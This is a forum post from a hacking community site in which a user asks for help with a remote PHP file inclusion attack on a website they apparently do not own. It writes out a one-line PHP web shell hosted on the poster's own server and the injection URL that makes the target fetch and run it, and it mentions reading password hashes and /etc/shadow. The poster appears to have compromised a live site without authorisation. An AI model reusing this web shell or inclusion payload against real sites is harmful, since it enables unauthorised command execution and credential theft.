Follow us on Twitter!
Hacking isn't just Computers & Exploits. It's a Philosophy. - Mr_Cheese
Wednesday, April 16, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 16
Guests Online: 14
Members Online: 2

Registered Members: 82808
Newest Member: Krish
Latest Articles
View Thread

HellBound Hackers | Computer General | Web hacking

Author

next step


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 05-02-06 20:42
I recently found a web site vuln to php injection. but there are somethings that make no sense. I have the password hashes, i can read all the php sources i can see the files and directories. but...
the first thing is, lets say i have this code in http://myserver/cmd.php:
Code

<? passthru($cmd); ?>




when i inject it like this:
http://target.com/index.php?page=http://myserver/cmd.php?cmd=ls
it doesn't work, but when i change the source to:
Code

<? passthru("ls"); ?>




it works and shows the list of files.
i'm wondering why?? is there any problem with that php script??

secondly, it seems like i can access files and even etc/shadow but i can't edit/remove/make new files and directories.
can you explain why is it like this??

EDIT: never mind :)

GreyFox






Edited by on 06-02-06 01:37